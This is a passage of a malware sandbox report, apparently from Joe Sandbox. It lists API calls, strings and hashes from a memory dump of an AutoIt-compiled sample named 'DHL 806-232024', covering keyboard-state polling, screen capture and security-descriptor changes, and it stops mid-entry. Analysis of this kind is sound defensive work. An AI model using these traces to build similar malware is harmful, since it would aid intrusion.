                                                                                  • Instruction ID: 282981d862cc4af99946fa62313c0657b09769c95aa36d55d9b2271b878aa6b5
                                                                                  • Opcode Fuzzy Hash: 332d54f03c12242f44831f097d01d9d882338de8b6e031abcbd8aa41f9d435d8
                                                                                  • Instruction Fuzzy Hash: D68180B0209305AFD710CF26C984A6BBBE8FB88355F10492EFD9597291D770E909DF92
                                                                                  APIs
                                                                                    • Part of subcall function 0092874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00928766
                                                                                    • Part of subcall function 0092874A: GetLastError.KERNEL32(?,0092822A,?,?,?), ref: 00928770
                                                                                    • Part of subcall function 0092874A: GetProcessHeap.KERNEL32(00000008,?,?,0092822A,?,?,?), ref: 0092877F
                                                                                    • Part of subcall function 0092874A: HeapAlloc.KERNEL32(00000000,?,0092822A,?,?,?), ref: 00928786
                                                                                    • Part of subcall function 0092874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0092879D
                                                                                    • Part of subcall function 009287E7: GetProcessHeap.KERNEL32(00000008,00928240,00000000,00000000,?,00928240,?), ref: 009287F3
                                                                                    • Part of subcall function 009287E7: HeapAlloc.KERNEL32(00000000,?,00928240,?), ref: 009287FA
                                                                                    • Part of subcall function 009287E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00928240,?), ref: 0092880B
                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00928458
                                                                                  • _memset.LIBCMT ref: 0092846D
                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0092848C
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 0092849D
                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 009284DA
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009284F6
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00928513
                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00928522
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00928529
                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0092854A
                                                                                  • CopySid.ADVAPI32(00000000), ref: 00928551
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00928582
                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009285A8
                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009285BC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3996160137-0
                                                                                  • Opcode ID: 105e21f915047bbdb8fde2080944b25dbc5723d388e9484179e48170056ba817
                                                                                  • Instruction ID: 4c84bc515e20d784d7f46d56f5c7cb7dbbad14c0439c397a7963fac88e5400e9
                                                                                  • Opcode Fuzzy Hash: 105e21f915047bbdb8fde2080944b25dbc5723d388e9484179e48170056ba817
                                                                                  • Instruction Fuzzy Hash: 0E61597190121AABDF00DFA5EC48EAEBBB9FF04311F088169F815A7291DB349A04DF60
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 009476A2
                                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 009476AE
                                                                                  • CreateCompatibleDC.GDI32(?), ref: 009476BA
                                                                                  • SelectObject.GDI32(00000000,?), ref: 009476C7
                                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0094771B
                                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00947757
                                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0094777B
                                                                                  • SelectObject.GDI32(00000006,?), ref: 00947783
                                                                                  • DeleteObject.GDI32(?), ref: 0094778C
                                                                                  • DeleteDC.GDI32(00000006), ref: 00947793
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0094779E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                  • String ID: (
                                                                                  • API String ID: 2598888154-3887548279
                                                                                  • Opcode ID: ce727780850468428179fc68a4fef8058fc0971cd44d546d0d7e5b8d91e84b4f
                                                                                  • Instruction ID: 98c0d330b6954667366003622b029db2a99b686f78f5cdbd09539a8bd1abbcb9
                                                                                  • Opcode Fuzzy Hash: ce727780850468428179fc68a4fef8058fc0971cd44d546d0d7e5b8d91e84b4f
                                                                                  • Instruction Fuzzy Hash: 86513875908309EFCB15CFA9CC85EAEBBB9EF48710F14852DF94AA7250D731A940CB60
                                                                                  APIs
                                                                                  • LoadStringW.USER32(00000066,?,00000FFF,0095FB78), ref: 0093A0FC
                                                                                    • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                                                  • LoadStringW.USER32(?,?,00000FFF,?), ref: 0093A11E
                                                                                  • __swprintf.LIBCMT ref: 0093A177
                                                                                  • __swprintf.LIBCMT ref: 0093A190
                                                                                  • _wprintf.LIBCMT ref: 0093A246
                                                                                  • _wprintf.LIBCMT ref: 0093A264
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                  • API String ID: 311963372-2391861430
                                                                                  • Opcode ID: 0446497a11ff4da420c6a12543232fb7d9a4c5394dd5bd1485f1ec286ec285bc
                                                                                  • Instruction ID: 1bed7ac30e7368332a35a8a5f77a3daed82b37a5a8c364dba0f3f0169289e060
                                                                                  • Opcode Fuzzy Hash: 0446497a11ff4da420c6a12543232fb7d9a4c5394dd5bd1485f1ec286ec285bc
                                                                                  • Instruction Fuzzy Hash: 99518E31904219AACF15EBE4CD86EEEB779FF04300F100266F515B22A1EB356F48DB52
                                                                                  APIs
                                                                                    • Part of subcall function 008F0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,008D6C6C,?,00008000), ref: 008F0BB7
                                                                                    • Part of subcall function 008D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008D48A1,?,?,008D37C0,?), ref: 008D48CE
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008D6D0D
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 008D6E5A
                                                                                    • Part of subcall function 008D59CD: _wcscpy.LIBCMT ref: 008D5A05
                                                                                    • Part of subcall function 008F387D: _iswctype.LIBCMT ref: 008F3885
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                  • API String ID: 537147316-1018226102
                                                                                  • Opcode ID: 5c768bdc875eec865217385865f10a792338eb6b9374ba0a1180116a6c6743b2
                                                                                  • Instruction ID: a58f73cf7a9e53af7b390a34907c0f4d4aeaec2c76a1d7b2d05812229d7ed005
                                                                                  • Opcode Fuzzy Hash: 5c768bdc875eec865217385865f10a792338eb6b9374ba0a1180116a6c6743b2
                                                                                  • Instruction Fuzzy Hash: F90258711083459FC724EF28C891AAEBBE5FF99314F144A1EF496972A1EB30D949CB43
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 008D45F9
                                                                                  • GetMenuItemCount.USER32(00996890), ref: 0090D7CD
                                                                                  • GetMenuItemCount.USER32(00996890), ref: 0090D87D
                                                                                  • GetCursorPos.USER32(?), ref: 0090D8C1
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 0090D8CA
                                                                                  • TrackPopupMenuEx.USER32(00996890,00000000,?,00000000,00000000,00000000), ref: 0090D8DD
                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0090D8E9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                  • String ID:
                                                                                  • API String ID: 2751501086-0
                                                                                  • Opcode ID: 5228ef222ceb6f1570638235e8120e8866fe1d03683537be6a88c9be7f10527c
                                                                                  • Instruction ID: 9a2cd65d1f3c659cbac32df0e509da6f9454a894e8b3c014bcad660c33da3088
                                                                                  • Opcode Fuzzy Hash: 5228ef222ceb6f1570638235e8120e8866fe1d03683537be6a88c9be7f10527c
                                                                                  • Instruction Fuzzy Hash: 90712770645209BFFB208F55DC89FAABF68FF45368F204216F515A61E1C7B1AC10DB90
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00950038,?,?), ref: 009510BC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpper
                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                  • API String ID: 3964851224-909552448
                                                                                  • Opcode ID: 7ca2330b5612b2297167b27a947e5a29615d188f074210b38decf3c03318c94b
                                                                                  • Instruction ID: a95214c18fc70f1c7ff697f61253cb2b48a8c22c9f4b075f1ff0c0d58faf1d8e
                                                                                  • Opcode Fuzzy Hash: 7ca2330b5612b2297167b27a947e5a29615d188f074210b38decf3c03318c94b
                                                                                  • Instruction Fuzzy Hash: 39415B3015834E8BCF20FFA5D891AEA3764FF12301F544655EDA19B292DB34AD1ACB61
                                                                                  APIs
                                                                                    • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                                                                    • Part of subcall function 008D7A84: _memmove.LIBCMT ref: 008D7B0D
                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009355D2
                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009355E8
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009355F9
                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0093560B
                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0093561C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: SendString$_memmove
                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                  • API String ID: 2279737902-1007645807
                                                                                  • Opcode ID: 93ec20d324fd1785b76fd7e9859aa17f91ec4f1613fd34804244d446a74ee58d
                                                                                  • Instruction ID: 80320b10b32f745538a3090c05f33ddf6e413757b73ba5d043e913536d0a37ca
                                                                                  • Opcode Fuzzy Hash: 93ec20d324fd1785b76fd7e9859aa17f91ec4f1613fd34804244d446a74ee58d
                                                                                  • Instruction Fuzzy Hash: 6D11942055016979E720B665DC4ADFF7B7CFFD5F04F40056BB401E21D1EE641E05CAA2
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                  • String ID: 0.0.0.0
                                                                                  • API String ID: 208665112-3771769585
                                                                                  • Opcode ID: 2bfa724d9b8f6b11fe4229067ef3716e8d386d33ea0eeff48c29c26cb0e595a4
                                                                                  • Instruction ID: 31b282a6ed3ab05f0ee6d4964ec7d9e6ef3c08333f871838dd7b31b4a58b59e9
                                                                                  • Opcode Fuzzy Hash: 2bfa724d9b8f6b11fe4229067ef3716e8d386d33ea0eeff48c29c26cb0e595a4
                                                                                  • Instruction Fuzzy Hash: 1511EB31918118ABCB20EB34EC4AFEB77BCEF44721F050176F505D6161EF759A819B52
                                                                                  APIs
                                                                                  • timeGetTime.WINMM ref: 0093521C
                                                                                    • Part of subcall function 008F0719: timeGetTime.WINMM(?,75A8B400,008E0FF9), ref: 008F071D
                                                                                  • Sleep.KERNEL32(0000000A), ref: 00935248
                                                                                  • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0093526C
                                                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0093528E
                                                                                  • SetActiveWindow.USER32 ref: 009352AD
                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009352BB
                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 009352DA
                                                                                  • Sleep.KERNEL32(000000FA), ref: 009352E5
                                                                                  • IsWindow.USER32 ref: 009352F1
                                                                                  • EndDialog.USER32(00000000), ref: 00935302
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                  • String ID: BUTTON
                                                                                  • API String ID: 1194449130-3405671355
                                                                                  • Opcode ID: 1e64b250915191ec7f7c041fa7f0500bad8d321f1b6d30e103f15fa2547de7f4
                                                                                  • Instruction ID: e9d76c599801249e69990f9e2c6ed9853b7001c8967ad21712aff18efbc1bed9
                                                                                  • Opcode Fuzzy Hash: 1e64b250915191ec7f7c041fa7f0500bad8d321f1b6d30e103f15fa2547de7f4
                                                                                  • Instruction Fuzzy Hash: 6C21C37022D704AFE7005BB5EC98B2B7B6DEB8A35BF060425F412821B1DB61DC40BF22
                                                                                  APIs
                                                                                    • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                                                    • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                                                                  • CoInitialize.OLE32(00000000), ref: 0093D855
                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0093D8E8
                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 0093D8FC
                                                                                  • CoCreateInstance.OLE32(00962D7C,00000000,00000001,0098A89C,?), ref: 0093D948
                                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0093D9B7
                                                                                  • CoTaskMemFree.OLE32(?,?), ref: 0093DA0F
                                                                                  • _memset.LIBCMT ref: 0093DA4C
                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0093DA88
                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0093DAAB
                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 0093DAB2
                                                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0093DAE9
                                                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 0093DAEB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                  • String ID:
                                                                                  • API String ID: 1246142700-0
                                                                                  • Opcode ID: 584fac2075002fe3c9bf7911300642e9b218d9108c4f9d3195ea34ccf73735bb
                                                                                  • Instruction ID: 188d1d9b1f6575fc805c3dd846bc6981d86f6d6d9476a8fb4fba71f00408a84a
                                                                                  • Opcode Fuzzy Hash: 584fac2075002fe3c9bf7911300642e9b218d9108c4f9d3195ea34ccf73735bb
                                                                                  • Instruction Fuzzy Hash: 60B1F975A00219AFDB04DFA5D898EAEBBB9FF48314F048469F506EB261DB30AD41CF51
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?), ref: 009305A7
                                                                                  • SetKeyboardState.USER32(?), ref: 00930612
                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00930632
                                                                                  • GetKeyState.USER32(000000A0), ref: 00930649
                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00930678
                                                                                  • GetKeyState.USER32(000000A1), ref: 00930689
                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 009306B5
                                                                                  • GetKeyState.USER32(00000011), ref: 009306C3
                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 009306EC
                                                                                  • GetKeyState.USER32(00000012), ref: 009306FA
                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00930723
                                                                                  • GetKeyState.USER32(0000005B), ref: 00930731
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: State$Async$Keyboard
                                                                                  • String ID:
                                                                                  • API String ID: 541375521-0
                                                                                  • Opcode ID: 7d8aa5143ee2937812e3f03efd267fa14e0b1b75248a5c4a5982c59fc4db10c9
                                                                                  • Instruction ID: 50ccd1a8150bb4a8286277c35cd9580d30ede7a86c8b3d3d72a616d643a340e9
                                                                                  • Opcode Fuzzy Hash: 7d8aa5143ee2937812e3f03efd267fa14e0b1b75248a5c4a5982c59fc4db10c9
                                                                                  • Instruction Fuzzy Hash: CD511C60A0878829FB34DBB088757EABFB89F81380F08459DD5C2571C2DA64DB4CCF65
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,00000001), ref: 0092C746
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0092C758
                                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0092C7B6
                                                                                  • GetDlgItem.USER32(?,00000002), ref: 0092C7C1
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0092C7D3
                                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0092C827
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0092C835
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0092C846
                                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0092C889
                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0092C897
                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0092C8B4
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0092C8C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                  • String ID:
                                                                                  • API String ID: 3096461208-0
                                                                                  • Opcode ID: f0d8a6904a55f76cc8ced231efacce4701a58ca36abc7b403393635f03c6a1b7
                                                                                  • Instruction ID: ee36cd5273971fccbbe29ec03b327a54cbadd5843a4e6df41afdef45403ec2bc
                                                                                  • Opcode Fuzzy Hash: f0d8a6904a55f76cc8ced231efacce4701a58ca36abc7b403393635f03c6a1b7
                                                                                  • Instruction Fuzzy Hash: F6512FB1B10209AFDF18CFA9DD99AAEBBBAEB88311F14812DF515D7294D7709D008B50
                                                                                  APIs
                                                                                    • Part of subcall function 008D1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008D2036,?,00000000,?,?,?,?,008D16CB,00000000,?), ref: 008D1B9A
                                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008D20D3
                                                                                  • KillTimer.USER32(-00000001,?,?,?,?,008D16CB,00000000,?,?,008D1AE2,?,?), ref: 008D216E
                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 0090BEF6
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008D16CB,00000000,?,?,008D1AE2,?,?), ref: 0090BF27
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008D16CB,00000000,?,?,008D1AE2,?,?), ref: 0090BF3E
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008D16CB,00000000,?,?,008D1AE2,?,?), ref: 0090BF5A
                                                                                  • DeleteObject.GDI32(00000000), ref: 0090BF6C
                                                                                  Memory Dump Source
